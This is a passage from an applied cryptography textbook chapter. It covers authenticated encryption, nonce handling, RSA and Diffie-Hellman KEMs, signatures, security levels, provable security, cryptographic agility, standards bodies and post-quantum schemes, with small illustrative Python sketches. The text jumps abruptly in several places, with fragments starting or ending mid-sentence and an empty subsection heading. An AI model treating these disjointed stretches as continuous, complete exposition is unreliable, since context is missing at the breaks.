used in large-scale applications. Some examples include the use of zero-knowledge proofs
in anonymous cryptocurrencies, the use of Multi-Party Computation (MPC) techniques to
enable computations on sensitive data in environments where parties are mutually untrusting,
and the (to date, limited) use of Fully Homomorphic Encryption (FHE) for privacy-preserving
machine learning.
equality across multiple encryptions. This example, while simple, is not artificial: the SSH
protocol historically used such an E&M scheme and only avoided the security failure due
to the inclusion of a per-message sequence number as part of the plaintext (this sequence
number was also needed to achieve other security properties of the SSH secure channel).
This example generalises, in the sense that even small and seemingly trivial details can have
a large effect on security: in cryptography, every bit matters.
In view of the above observations, applied cryptography is properly concerned with a broader
sweep of topics than just the low-level cryptographic algorithms. Of course these are still
crucial and we will cover them briefly. However, applied cryptography is also about the inte-
gration of cryptography into systems and development processes, the thorny topic of key
management and even the interaction of cryptography with social processes, practices and
relations. We will touch on all of these aspects.
Cryptography is Political
Like many other technologies, cryptography can be used for good or ill. It is used by human
rights campaigners to securely organise their protests using messaging apps like Telegram
and Signal [1621]. It is used by individuals who wish to maintain their privacy against the incur-
sions of tech companies. It enables whistle-blowers to securely communicate with journalists
when disclosing documents establishing company or governmental wrong-doing (see Privacy
& Online Rights Knowledge Area (Section 5.4)). But it can also be used by terrorists to plan
attacks or by child-abusers to share illegal content. Meanwhile cryptocurrencies can be used
by drug dealers to launder money [1622] and as a vehicle for extracting ransom payments.1
These examples are chosen to highlight that cryptography, historically the preserve of govern-
ments and their militaries, is now in everybody’s hands — or more accurately, on everybody’s
phone. This is despite intensive, expensive efforts over decades on the part of governments
to regulate the use of cryptography and the distribution of cryptographic technology through
export controls. Indeed, such laws continue to exist, and violations of them can produce
severe negative consequences so practitioners should be cautious to research applicable
regulation (see Law & Regulation Knowledge Area (Section 3.11.3) for further discussion of
this topic).
But the cryptographic genie has escaped the bottle and is not going back in. Indeed, crypto-
graphic software of reasonable quality is now so widespread that attempts to prevent its use
or to introduce government-mandated back-doors are rendered irrelevant for anyone with a
modicum of skill. This is to say nothing as to whether it is even possible to securely engineer
cryptographic systems that support exceptional access for a limited set of authorised parties,
something which experts doubt, see for example [1624]. Broadly, these efforts at control and
the reaction to them by individual researchers, as well as companies, are colloquially known
as The Crypto Wars. Sometimes, these are enumerated, though it is arguable that the First
Crypto War never ended, but simply took on another, less-intense, less-visible form, as became
apparent from the Snowden revelations [1625].
1
On the other hand, a 2019 RAND report [1623] concluded there is little evidence for use of cryptocurrencies
by terrorist groups.
Organisation
Having laid out the landscape of Applied Cryptography, we now turn to a more detailed
consideration of sub-topics. The next section is concerned with cryptographic algorithms
and schemes — the building blocks of cryptography. It also discusses protocols, which typi-
cally combine multiple algorithms into a more complex system. In Section 18.2 we discuss
implementation aspects of cryptography, addressing what happens when we try to turn a
mathematical description of a cryptographic algorithm into running code. Cryptography simply
translates the problem of securing data into that of securing and managing cryptographic
keys, following Wheeler’s aphorism that every problem in computer science can be solved by
another level of indirection. We address the topic of key management in Section 18.3. Sec-
tion 18.4 covers a selection of issues that may arise for non-expert consumers of cryptography,
while Section 18.5 discusses a few core cryptographic applications as a means of showing
how the different cryptographic threads come together in specific cases. Finally, Section 18.6
looks to the future of applied cryptography and conveys closing thoughts.
2
Here, for example, FIDO is developing open specifications of interfaces for authenticating users to web-
based applications and services using public key cryptography.
3
This concept refers to methods by which a hardware platform can provide security guarantees to third
parties about how it will execute code. It is addressed in the Hardware Security Knowledge Area (Chapter 20).
k = 56, which experts considered too short even when the algorithm was introduced
by the US government in the mid-1970s.
The Advanced Encryption Standard (AES) [1627] is now the most-widely used block cipher. The
AES was the result of a design competition run by the US government agency NIST. It has a
128-bit block (n = 128) and its key length k is 128, 192 or 256 bits, precluding exhaustive key
search. Fast implementation of AES is supported by hardware instructions on many Central
Processing Unit (CPU) models. Fast and secure implementation of AES is challenging in
environments where an attacker may share memory resources with the victim, for example
a cache. Still, with its widespread support and lack of known security vulnerabilities, it is
rarely the case that any block cipher other than AES is needed. One exception to this rule is
constrained computing environments.
Except in very limited circumstances, block ciphers should not be used directly for encrypting
data. Rather, they are used in modes of operation [1628]. Modes are discussed further below
under Authenticated Encryption schemes.
ciphertext string C and, in the nonce-based setting, a nonce N. It returns either a plaintext
M or an error message indicating that decryption failed. Correctness of a nonce-based AE
scheme demands that, for all keys K, all plaintexts M and all nonces N, if running Enc on
input (K, M, N) results in ciphertext C, then running Dec on input (K, C, N) results in plaintext
M. Informally, correctness means that, for a given key, decryption “undoes” encryption.
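Written symbolically, this correctness condition is:

```latex
\forall K, M, N : \quad \mathsf{Dec}\big(K,\ \mathsf{Enc}(K, M, N),\ N\big) = M
```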
18.1.6.1 AE Security
18.1.6.2 Nonces in AE
It is a requirement in the IND-CPA security definition that the nonces used by the adversary
be unique across all calls to its LoR encryption oracle. Such an adversary is called a
nonce-respecting adversary. In practice, it is usually the responsibility of the application using an AE
scheme to ensure that this condition is met across all invocations of the Enc algorithm for a
given key K. Note that the nonces do not need to be random. Indeed choosing them randomly
may result in nonce collisions, depending on the quality of the random bit source used, the
size of the nonce space and the number of encryptions performed. For example, the nonces
could instead be generated using a stateful counter. The core motivation behind the nonce-based setting
for AE is that it is easier for a cryptographic implementation to maintain state across all
uses of a single key than it is to securely generate the random bits needed to ensure security
in the randomised setting. This is debatable and nonce repetitions have been observed in
practice [1632]. For some AE schemes such as the widely deployed AES-GCM scheme, the
security consequences of accidental nonce repetition are severe, e.g. total loss of integrity
and/or partial loss of confidentiality. For this reason, misuse-resistant AE schemes have
been developed. These are designed to fail more gracefully under nonce repetitions, revealing
less information in this situation than a standard AE scheme might. They are generally more
computationally expensive than standard AE schemes. AES-GCM-SIV [1633] is an example of
such a scheme.
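The following minimal sketch shows nonce management with a stateful counter, assuming the pyca/cryptography library's AES-GCM implementation; the 96-bit nonce size matches that library's convention for AES-GCM.

```python
# Sketch of nonce-respecting AES-GCM encryption using a stateful counter.
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)
aead = AESGCM(key)
counter = 0   # persistent state: must never repeat for this key

def encrypt(plaintext: bytes, associated_data: bytes = b"") -> tuple[bytes, bytes]:
    global counter
    nonce = counter.to_bytes(12, "big")   # 96-bit nonce derived from the counter
    counter += 1                          # state update guarantees uniqueness
    return nonce, aead.encrypt(nonce, plaintext, associated_data)

nonce, ct = encrypt(b"attack at dawn")
assert aead.decrypt(nonce, ct, b"") == b"attack at dawn"
```

In a real implementation the counter state must survive restarts (or the key must be rotated on restart); otherwise a nonce repetition, with the severe consequences described above, becomes possible.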
18.1.6.3 AE Variants
Many variants of the basic AE formulation and corresponding security notions have been devel-
oped. As an important example, Authenticated Encryption with Associated Data (AEAD) [1634]
refers to an AE extension in which an additional data field, the Associated Data (AD), is crypto-
graphically bound to the ciphertext and is integrity protected (but not made confidential). This
reflects common use cases. For example, we have a packet header that we wish to integrity
protect but which is needed in the clear to deliver data, and a packet body that we wish to both
integrity protect and make confidential. Even the basic AE security notion can be strengthened
by requiring that ciphertexts be indistinguishable from random bits or by considering security
in the multi-user setting, where the adversary interacts with multiple AE instantiations under
different, random keys and tries to break any one of them. The latter notion is important when
considering large-scale deployments of AE schemes. The two separate notions, IND-CPA and
INT-CTXT, can also be combined into a single notion [1635].
Secure AE (and AEAD) schemes can be constructed generically from simpler encryption
schemes offering only IND-CPA security and SUF-CMA secure MAC schemes. There are three
basic approaches: Encrypt-then-MAC (EtM), Encrypt-and-MAC (E&M) and MAC-then-Encrypt
(MtE). Of these, the security of EtM is the easiest to analyse and provides the most robust
combination, because it runs into fewest problems in implementations. Both MtE and E&M
have been heavily used in widely-deployed secure communications protocols such as SSL/TLS
and Secure Shell (SSH) with occasionally disastrous consequences [1636, 1637, 1638]. Broad
discussions of generic composition can be found in [1639] (in the randomised setting) and
[1640] (more generally).
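A minimal sketch of the EtM composition in the randomised setting, assuming the pyca/cryptography library: AES in CTR mode supplies the IND-CPA encryption component, HMAC-SHA-256 supplies the SUF-CMA MAC, the two use independent keys, and the MAC is computed over the entire ciphertext.

```python
# Sketch of generic Encrypt-then-MAC (EtM) with independent keys.
import os
import hmac
import hashlib
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

enc_key = os.urandom(16)   # key for AES-CTR
mac_key = os.urandom(32)   # independent key for HMAC-SHA-256

def etm_encrypt(plaintext: bytes) -> bytes:
    iv = os.urandom(16)    # random 128-bit initial counter block
    encryptor = Cipher(algorithms.AES(enc_key), modes.CTR(iv)).encryptor()
    ciphertext = iv + encryptor.update(plaintext) + encryptor.finalize()
    tag = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    return ciphertext + tag          # MAC covers IV and ciphertext (EtM)

def etm_decrypt(data: bytes) -> bytes:
    ciphertext, tag = data[:-32], data[-32:]
    expected = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # verify before decrypting
        raise ValueError("MAC verification failed")
    iv, body = ciphertext[:16], ciphertext[16:]
    decryptor = Cipher(algorithms.AES(enc_key), modes.CTR(iv)).decryptor()
    return decryptor.update(body) + decryptor.finalize()

assert etm_decrypt(etm_encrypt(b"example message")) == b"example message"
```

Verifying the tag before any decryption takes place is what makes EtM the most robust of the three compositions: invalid ciphertexts are rejected without processing their contents.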
This generic approach then leaves the question of how to obtain an encryption scheme
offering IND-CPA security. This is easily achieved by using a block cipher in a suitable mode of
operation [1628], for example, counter (CTR) mode or CBC mode. Such a mode takes a block
cipher and turns it into a more general encryption algorithm capable of encrypting messages
of variable length, whereas a block cipher can only encrypt messages of length n bits for some
fixed n. The IND-CPA security of the mode can then be proved based on the assumption that
the used block cipher is a PRP. Indeed, the nonce-based AEAD scheme AES-GCM [1628] can be
seen as resulting from a generic EtM construction applied using AES in a specific nonce-based
version of CTR mode and an SUF-CMA MAC constructed from a universal hash function based
on finite field arithmetic. AES-GCM is currently used in about 90% of all TLS connections on
the web. It has excellent performance on commodity CPUs from Intel and AMD because of
their hardware support for the AES operations and for the finite field operations required by
the MAC. A second popular AEAD scheme, ChaCha20-Poly1305 [1641], arises in a similar way
from different underlying building blocks. The CAESAR competition7 was a multi-year effort to
produce a portfolio of AEAD schemes for three different use cases: lightweight applications,
high-performance applications and defence in depth (essentially, misuse-resistant AE).
decryption.
There are many flavours of security for PKE. We focus on just one, which is sufficient for many
applications, and provide a brief discussion of some others.
Recall the definition of IND-CPA and IND-CCA security for AE schemes from Section 18.1.6.
Analogous notions can be defined for PKE. In the IND-CPA setting for PKE, we generate a key
pair (sk, pk) by running KeyGen and give the public key pk to an adversary (since public keys
are meant to be public!). The adversary then has access to an LoR encryption oracle which, on
input a pair of equal-length messages (M0, M1), performs encryption of Mb under the public
key pk, i.e. runs the randomised algorithm Enc on input (pk, Mb), to get a ciphertext C which
is then returned to the adversary. The adversary’s task is to make an estimate of the bit b,
given repeated access to the oracle while, in tandem, performing any other computations it
likes. The adversary is considered successful if, at the end of its attack, it outputs a bit b0 such
that b0 = b. A PKE scheme is said to be IND-CPA secure (“indistinguishability under chosen
plaintext attack”) if no adversary, consuming reasonable resources (quantified in terms of the
computational resources it uses and the number of queries it makes) is able to succeed with
probability significantly greater than 1/2. The intuition behind IND-CPA security for PKE is the
same as that for AE: even with perfect control over which pairs of messages get encrypted,
an adversary cannot tell from the ciphertext which one of the pairs is encrypted each time.
Note that in order to be IND-CPA secure, a PKE scheme must have a randomised encryption
algorithm (if Enc were deterministic, then an adversary that first makes an encryption query on
the pair (M0, M1) with M0 ≠ M1 and then an encryption query on (M0, M0) could easily break
the IND-CPA notion). If a PKE scheme is IND-CPA secure, then it must be computationally
difficult to recover sk from pk, since, if this were possible, then an adversary could first recover
sk and then decrypt one of the returned ciphertexts C and thereby find the bit b.
IND-CCA security for PKE is defined by extending the IND-CPA notion to also equip the adver-
sary with a decryption oracle. The adversary can submit (almost) arbitrary bit-strings to this
oracle. The oracle responds by running the decryption algorithm and returning the resulting
plaintext or error message to the adversary. To prevent trivial wins for the adversary and
therefore avoid a vacuous security definition, we have to restrict the adversary to not make
decryption oracle queries for any of the outputs obtained from its encryption oracle queries.
We do not generally consider integrity notions for PKE schemes. This is because, given the
public key pk, an adversary can easily create ciphertexts of its own, so no simple concept of
“ciphertext integrity” would make sense for PKE. Integrity in the public key setting, if required,
usually comes from the application of digital signatures, as discussed in Section 18.1.9. Digital
signatures and PKE can be combined in a cryptographic primitive called signcryption. This
can be a useful primitive in some use-cases, e.g. secure messaging (see Section 18.5.2).
In some applications, such as anonymous communications or anonymous cryptocurrencies,
anonymity of PKE plays a role. Roughly speaking, this says that a PKE ciphertext should not
leak anything about the public key pk that was used to create it. This is an orthogonal property
to IND-CPA/IND-CCA security. A related concept is robustness for PKE, which informally says
that a ciphertext generated under one public key pk should not decrypt correctly under the
private key sk′ corresponding to a second public key pk′. Such a property, and stronger variants
of it, are needed to ensure that trial decryption of anonymous ciphertexts does not produce
unexpected results [1642].
A Key Encapsulation Mechanism (KEM) is a cryptographic scheme that simplifies the design
and use of PKE. Whereas a PKE scheme can encrypt arbitrary messages, a KEM is limited to
encrypting symmetric keys. One can then build a PKE scheme from a KEM and an AE scheme
(called a Data Encapsulation Mechanism, DEM, in this context): first use the KEM to encrypt a
symmetric key K, then use K in the AE scheme to encrypt the desired message; ciphertexts
now consist of two components: the encrypted key and the encrypted message.
We can define IND-CPA and IND-CCA security notions for KEMs. These are simpler to work with
than the corresponding notions for PKE and this simplifies security analysis (i.e. generating
and checking formal proofs). Moreover, there is a composition theorem for KEMs which says
that if one takes an IND-CCA secure KEM and combines it with an AE-secure DEM (AE scheme)
as above, then one gets an IND-CCA secure PKE scheme. As well as simplifying design and
analysis, this KEM-DEM or hybrid viewpoint on PKE reflects how PKE is used in practice.
Because PKE algorithms are generally slow and impose a large ciphertext overhead (compared to symmetric alternatives like AE), we do not use PKE directly to encrypt messages. Instead, we use
a KEM to encrypt a short symmetric key and then use that key to encrypt our bulk messages.
Perhaps the most famous PKE scheme is the RSA scheme. In its textbook form, the public key consists of a pair (e, N) where N is a product p · q of two large primes and the private key consists of a value d such that d · e = 1 mod (p − 1)(q − 1). Encryption of a message M, seen as a large integer modulo N, sets C = M^e mod N. On account of the mathematical relationship between d and e, it can be shown that then M = C^d mod N. So encryption is done by “raising to the power of e mod N” and decryption is done by “raising to the power of d mod N”. These operations can be carried out efficiently using the square-and-multiply algorithm and its variants. Decryption can be accelerated by working separately modulo p and q and then combining the results using the Chinese Remainder Theorem (CRT).
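As a toy numerical illustration (with artificially small primes; as stressed below, textbook RSA is insecure and this serves only to exhibit the relationship between e and d):

    p, q = 61, 53
    N = p * q                            # 3233
    e = 17
    d = pow(e, -1, (p - 1) * (q - 1))    # 2753, since d * e = 1 mod (p-1)(q-1)

    M = 65
    C = pow(M, e, N)                     # 2790; pow() performs efficient modular
    assert pow(C, d, N) == M             # exponentiation (a square-and-multiply variant)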
The security of RSA, informally, depends on the hardness of the Integer Factorisation Problem
(IFP): if an adversary can recover p and q from N , then it can recompute d from e, p and q
using the extended Euclidean algorithm. But what we really want is a converse result: if an
adversary can break RSA, then it should be possible to use that adversary in a black-box
manner as a subroutine to create an algorithm that factors the modulus N or solves some
other presumed-to-be-hard problem.
This textbook version of RSA is completely insecure and must not be used in practice. Notice,
for example, that it is not randomised, so it certainly cannot be IND-CPA secure. Instead RSA
must be used as the basis for constructing more secure alternatives. This is usually done by
performing a keyless encoding step, represented as a function µ(·), on the message before
applying the RSA transform. Thus we have C = µ(M)^e mod N. Decryption then involves
applying the reverse transform and decoding.
In order to achieve modern security notions, µ(·) must be randomised. One popular encoding
scheme, called PKCS#1 v1.5 and specified in [1643], became very common in applications due
to its relatively early standardisation and its ease of implementation. Unfortunately, RSA with
PKCS#1 v1.5 encoding does not achieve IND-CCA security, as demonstrated by the famous
Bleichenbacher attack [1644]. Despite now being more than 20 years old, variants of the
Bleichenbacher attack still regularly affect cryptographic deployments, see for example [1645].
A better encoding scheme is provided in PKCS#1 v2.1 (also specified in [1643]), but it has not
fully displaced the earlier variant. RSA with PKCS#1 v2.1 encoding — also called RSA-OAEP — can be proven to yield an IND-CCA secure PKE scheme, but the best security proof we have [1646] is unsatisfactory in various technical respects: it is not tight and it requires a strong assumption about the hardness of a certain computational problem. Improved
variants with better security analyses do exist in the literature but have not found their way
into use.
One can easily build an IND-CCA secure KEM from the RSA primitive, as follows: select M at random from {0, 1, . . . , N − 1}, set C = M^e mod N (as in textbook RSA) and define K = H(M) to be the encapsulated symmetric key. Here H is a cryptographic hash function (e.g. SHA-256). This scheme can be proven secure by modelling H as a random oracle, under the assumption that the RSA inversion problem is hard. The RSA inversion problem is, informally: given e, N and M^e mod N for a random M, recover M. The RSA inversion problem is no harder than the IFP, since any algorithm that solves the IFP can be used to construct an algorithm that solves the RSA inversion problem. But the RSA inversion problem could be easier than the IFP and it is an open problem to fully decide this question.
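The following minimal sketch instantiates this RSA-KEM in Python, with SHA-256 playing the role of H; the key generation call comes from the `cryptography` package and the integer encoding is simplified for illustration only; this is not a vetted implementation.

    import hashlib, secrets
    from cryptography.hazmat.primitives.asymmetric import rsa

    priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    pub = priv.public_key().public_numbers()
    N, e = pub.n, pub.e
    d = priv.private_numbers().d

    def H(m: int) -> bytes:                  # SHA-256 in the role of H
        return hashlib.sha256(m.to_bytes(256, "big")).digest()

    def encap():
        M = secrets.randbelow(N)             # M random in {0, 1, ..., N-1}
        return pow(M, e, N), H(M)            # (ciphertext, encapsulated key)

    def decap(C: int) -> bytes:
        return H(pow(C, d, N))

    C, key = encap()
    assert decap(C) == key                   # receiver derives the same key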
Note that RSA encryption is gradually being displaced in applications by schemes based on Elliptic Curve Cryptography (ECC), because of ECC’s superior performance and smaller key sizes for a
given target security level. See Section 18.1.13 for further discussion.
We will discuss another class of PKE schemes, based on the Discrete Logarithm Problem
(DLP) after discussing Diffie-Hellman Key Exchange.
order q. By choosing q and p of an appropriate size, we can make the DLP, and presumably the
CDHP, hard enough to attain a desired security level (see further discussion in Section 18.1.13).
An alternative that has largely now displaced this traditional “finite field Diffie-Hellman” setting
in applications is to use as G the group of points on an elliptic curve over a finite field. This
allows more efficient implementation and smaller key sizes at high security levels, but comes
with additional implementation pitfalls.
The raw DHKE protocol as described directly above is rarely used in practice, because it
is vulnerable to active Man-in-the-Middle (MitM) attacks, in which the adversary replaces
the values g^x and g^y exchanged in the protocol with values for which it knows the discrete
logarithms. However, the core idea of doing “multiplication in the exponent” is used repeatedly
in cryptographic protocols. MitM attacks are generally prevented by adding some form of
authentication (via MACs or digital signatures) to the protocol. This leads to the notion of
Authenticated Key Exchange (AKE) protocols — see [1648] for a comprehensive treatment.
It is important also for Alice and Bob to use trusted parameters, or to verify the cryptographic
strength of the parameters that they receive, in DHKE. This can be a complex undertaking
even in the traditional setting, since a robust primality test is needed [1649, 1650]. In the
elliptic curve setting, it is not reasonable to expect the verification to be done by protocol
participants and we use one of a small number of standardised curves. It is also important
for the respective parties to check that the received values g^y and g^x do lie in the expected
group, otherwise the protocol may be subject to attacks such as the small sub-group attack.
These checks may be computationally costly.
It is easy to build a KEM from the DHKE primitive. We simply set the KeyGen algorithm to output a key pair (sk, pk) = (y, g^y) (where y is generated as in DHKE), while Encrypt selects x as in DHKE and then simply outputs the group element g^x as the ciphertext. Finally, Decrypt takes as input a group element h and outputs KDF(h^y) where KDF(·) denotes a suitable key derivation function (as covered in Section 18.3.2). So the symmetric key encapsulated by group element g^x is KDF(g^xy).
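A minimal sketch of this DH-based KEM in the elliptic curve setting, using X25519 from the `cryptography` package and HKDF-SHA256 as the KDF (the info string and key length are illustrative choices; this is essentially the KEM at the core of ECIES, discussed next):

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
    from cryptography.hazmat.primitives.kdf.hkdf import HKDF

    def kdf(shared: bytes) -> bytes:
        return HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                    info=b"dh-kem sketch").derive(shared)

    def keygen():                            # (sk, pk) = (y, g^y)
        sk = X25519PrivateKey.generate()
        return sk, sk.public_key()

    def encap(pk):
        eph = X25519PrivateKey.generate()    # ephemeral x
        return eph.public_key(), kdf(eph.exchange(pk))   # ciphertext g^x, key KDF(g^xy)

    def decap(sk, ct) -> bytes:
        return kdf(sk.exchange(ct))          # KDF((g^x)^y) = KDF(g^xy)

    sk, pk = keygen()
    ct, key = encap(pk)
    assert decap(sk, ct) == key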
From this KEM, using the standard KEM-DEM construction, we obtain a variant of the ElGamal encryption scheme [1651] called the Diffie-Hellman Integrated Encryption Scheme (DHIES), analysed in [1652]. In the elliptic curve setting, the scheme is known as ECIES. It is a particularly neat PKE scheme with compact ciphertexts and strong security properties. It avoids many of the implementation issues associated with standardised variants of RSA.
Interestingly, signature schemes can be built from symmetric primitives, specifically hash
functions. The original idea goes back to Lamport [1657]: to be able to sign a single-bit message, commit in the verification key to two values h0 = H(M0) and h1 = H(M1), where M0 encodes a zero-bit and M1 encodes a one-bit. So the verification key is (h0, h1) and the signing key is (M0, M1). Now to sign a single bit b, the signer simply outputs Mb; the verification algorithm checks the relation hb = H(Mb), outputting “1” if this holds. The original Lamport scheme is one-time use only and only signs a single-bit message. But many enhancements have
been made to it over the years bringing it to a practically usable state. A specific hash-based
signature scheme SPHINCS+ is an “alternate candidate” in the NIST PQC process for selecting
post-quantum secure schemes, see Section 18.1.16 for further discussion.
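A minimal sketch of the one-bit Lamport scheme just described, with SHA-256 in the role of H:

    import hashlib, os

    def H(x: bytes) -> bytes:
        return hashlib.sha256(x).digest()

    def keygen():
        M0, M1 = os.urandom(32), os.urandom(32)     # signing key (M0, M1)
        return (M0, M1), (H(M0), H(M1))             # verification key (h0, h1)

    def sign(sk, b: int) -> bytes:
        return sk[b]                                # reveal the preimage for bit b

    def verify(vk, b: int, sig: bytes) -> bool:
        return H(sig) == vk[b]                      # check hb = H(Mb)

    sk, vk = keygen()
    sig = sign(sk, 1)
    assert verify(vk, 1, sig) and not verify(vk, 0, sig)

In the multi-bit generalisation (one key pair per message bit), signing two different messages reveals enough preimages to enable forgeries, which is why such keys must only ever be used once.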
Many forms of signature scheme with advanced security properties have been researched
and sometimes find their way into use, especially in privacy-oriented applications. For ex-
ample, blind signatures [1658] allow a party to obtain signatures on messages without the
signer knowing which message is being signed. Blind signature schemes can be used as a
building block in electronic cash and electronic voting schemes. As a second example, group
signatures allow one of many parties to sign messages in such a way that the verifier cannot
tell exactly which party produced the signature; meanwhile a group manager can “break” this
anonymity property. Group signatures have been used in the Trusted Computing Group’s Direct
Anonymous Attestation protocol [1396] to enable remote authentication of Trusted Platform
Modules whilst preserving privacy. A third example is provided by ring signatures [1659], which
have functionality similar to group signatures but without the opening capability possessed by
a group manager. The cryptocurrency Monero has used ring signatures to provide anonymity.
a “128-bit security level”.8 Such a computational feat seems still well beyond the horizon of even state security agencies. It’s naturally hard to estimate their capabilities but, for comparison, the number of hash computations carried out in global Bitcoin mining currently stands at around 2^67 per second and has the electricity consumption of a small sovereign state. At that rate, and assuming the cost of computing a hash is the same as that of testing an AES key, an exhaustive key search would still require 2^36, or about 10^11, years.9 If we are even more
conservative, or want a very large security margin over a long period of time (during which
large-scale quantum computers may become available), or are concerned about concrete
security in the context of multi-target attacks, then aiming for 192-bit or 256-bit security may
be attractive.
We should also be conservative in rejecting algorithms and schemes that have known weak-
nesses, even if seemingly minor. It is a truism that attacks in cryptography only get stronger
with time, either due to computational advances or the introduction of new cryptanalytic
ideas. This conservatism is in tension with the fact that replacing one cryptographic scheme
with another can be costly and time-consuming, unless cryptographic agility is built into our
system (see Section 18.1.14 for further discussion). We are often encumbered with legacy
cryptographic systems that cannot be easily updated, or where the system owners do not see
the value in doing so until a practical break is exhibited.
Notice also that such proofs are not unconditional, unlike most proofs in mathematics. A
typical proof shows that a given scheme or protocol satisfies a particular security definition
under some assumptions. Such proofs are often stated in a reductive fashion (i.e. as with
reductions from complexity theory): given any adversary in the form of an arbitrary algorithm
that can break the scheme according to the security definition, the proof shows that the
adversary A can be used as a subroutine in building an algorithm B that can break one of the
components of the scheme (e.g. find a collision in a hash function) or in building a different
algorithm C that can break some underlying hardness assumption (e.g. solve the IFP for
moduli N with distribution given by the KeyGen algorithm of a PKE scheme). For Applied Cryptography, concrete reductions are to be preferred. In our example, these are ones in which we eschew statements describing B or C as simply being “polynomial time” but in which the resources (computation, storage, etc.) consumed by the adversary A (and its advantage in breaking the scheme) are carefully related to those of algorithms B and C.
Furthermore, it is preferable that proofs should be tight. That is, we would like to have proofs
showing a close relationship between the resources consumed by and advantage of adversary
A on the one hand, and the resources consumed by and advantages of algorithms B and
C constructed from A on the other. The result of having a tight proof is that the scheme’s
security can be meaningfully related to that of its underlying components. This is not always
achieved, resulting in proofs that may be technically vacuous.
For complex cryptographic schemes and protocols, the security statements can end up being
difficult to interpret, as they may involve many terms and each term may relate to a different
component in a non-trivial way. Such security statements typically arise from proofs with
many hand-written steps that can hide errors or be difficult for humans to verify. Typically
though, such proofs are modularised in a sequence of steps that can be individually checked
and updated if found to be in error. A popular approach called “game hopping” or “sequences
of games”, as formalised in [1662, 1663] in two slightly different ways, lends itself to the
generation of such proofs. An alternative approach to taming the complexity of proofs comes
from the use of formal and automated analysis methods, see Formal Methods for Security
Knowledge Area (Chapter 13) for an extensive treatment.
The proofs are usually for mathematically tractable pseudo-code descriptions of the schemes,
not for the schemes as implemented in some high-level programming language and certainly
not for schemes as implemented in a machine language. So there is a significant gap in terms
of what artefacts the proofs actually make statements about. Researchers have had some
success in developing tools that can prove the security of running code and some code of this
type has been deployed in practice; for a good overview, see [1664]. Furthermore, a security
proof only gives guarantees concerning the success of attacks that lie within the scope of the
model and says nothing about what happens beyond that. For example, an adversary operating
in the real world may have greater capabilities than are provided to it in the security model
used for proving security. We shall return to these issues in the next section on cryptographic
implementation.
A sustained critique of the provable security approach has been mounted by Koblitz and
Menezes in their “Another look at . . .” series of papers, see [1665] for a retrospective. This
critique has not always been welcomed by the theoretical cryptography research community,
but any serious field should be able to sustain, reflect on and adapt to such critique. In our view,
the work of Koblitz and Menezes has helped to bridge the gap between theory and practice
in cryptography, since it has helped the community to understand and begin to address the
limitations of its formal foundations.
if it has an in-built capability to switch one algorithm for another and/or from one version
to another. This facility is enabled in secure communications protocols like IPsec, SSH and
SSL/TLS through cipher suite and version negotiation: the algorithms that will be used and the
protocol version are negotiated between the participating parties during the protocol execution
itself. Adding this facility to an already complex protocol may introduce security vulnerabilities,
since the negotiation mechanisms themselves may become a point of weakness. An example
of this is downgrade attacks in the context of SSL/TLS, which have exploited the co-existence
of different protocol versions [1667] as well as support for deliberately weakened “EXPORT”
cipher suites [438, 1668]. Cryptographic agility may also induce software bloat as there is an
incipient temptation to add everyone’s favourite algorithm.
At the opposite end of the spectrum from cryptographic agility lie systems (and their designers) that are cryptographically opinionated, that is, where a single set of algorithms is
selected and hard-coded. WireGuard [1669] is an example of such a protocol: it has no facility to change algorithms and does not even have a protocol version field.
There is a middle way: support cryptographic agility where possible, but with tight control over
which algorithms and legacy versions are supported.
For more information on cryptographic agility, especially in the post-quantum setting, we
recommend [1670].
Research Task Force (IRTF) is a sister-organisation to the IETF and its Crypto Forum Research
Group (CFRG)12 acts as a repository of expertise on which the IETF can draw. CFRG also
produces its own RFCs.
Standards bodies are not perfect. Too many bodies — and standards produced by them — can lead to cryptographic proliferation, which makes inter-operation harder to achieve. They can also lead to subtle incompatibilities between different versions of the same algorithms. Even
completely open standards bodies may fail to gather input from the right set of stakeholders.
Standards bodies can act prematurely and standardise a version of a scheme that is later
found to be deficient in some way, or where improved options only emerge later. Once the
standard is set, in the absence of serious attacks, there may be little incentive to change it.
The history of PKE schemes based on RSA illustrates this well (see Section 18.1.7.3): RSA with
PKCS#1 v1.5 encoding has led to many security issues and the introduction of attack-specific
work-arounds; RSA with PKCS#1 v2.1 encoding (RSA-OAEP) has been standardised for many
years but has not become widely used; meanwhile even better ways of turning RSA into a
KEM or a PKE have been discovered but have not become mainstream.
Standards bodies are also subject to “regulatory capture”, whereby groups representing
specific national or commercial interests have the potential to influence the work of a standards
body. For example, NSA had a role in the design of the DES algorithm [1671, pp. 232-233], and, on
another occasion, supplied the overall design of the Dual_EC_DRBG pseudorandom generator
that was specified in a NIST standard [1672], along with certain critical parameters [1673, p.
17]. In such contexts, transparency as to the role of any national or commercial stakeholders
is key. For instance, NIST have reviewed their cryptographic standardisation process [1673] to
increase transparency and decrease reliance on external organisations.
Other standards bodies relevant for cryptography include ETSI (which is active in post-quantum
cryptographic standardisation, as discussed immediately below) and IEEE (which developed
an early series of standards for Public Key Cryptography, IEEE P1363).
quantum resistant, or quantum-immune cryptography. PQC has been an active but niche
research field for many years.
In late 2016, in response to projected progress in scaling quantum computing and recognising
the long transition times needed for introducing new cryptographic schemes, NIST launched
a process to define a suite of post-quantum schemes.13 The focus of the NIST process is
on KEMs and digital signature schemes, since the threat quantum computing poses for
symmetric schemes is relatively weaker than it is for public key schemes. At the time of
writing in mid 2021, the process (actually a competition) has entered its third round and a set
of finalist schemes has been selected, alongside a set of alternate, or back-up schemes. The
NIST process should result in new NIST standards in the mid 2020s.
It will be a significant challenge to integrate the new schemes into widely-used protocols and
systems in a standardised way. This is because the NIST finalists have quite different (and
usually worse) performance profiles, in terms of key sizes, ciphertext or signature size and
computation requirements, from existing public key schemes. Work is underway to address
this challenge in IETF and ETSI and some deployment experiments have been carried out for
the TLS protocol by Google and CloudFlare.14 It is likely that post-quantum schemes will initially
be deployed in hybrid modes alongside classical public key algorithms, to hedge against the relative immaturity of their implementations and security analysis. The recent deployment experiments used
hybrid modes.
It is then important to be clear about what is — and is not — being formally specified and
analysed.
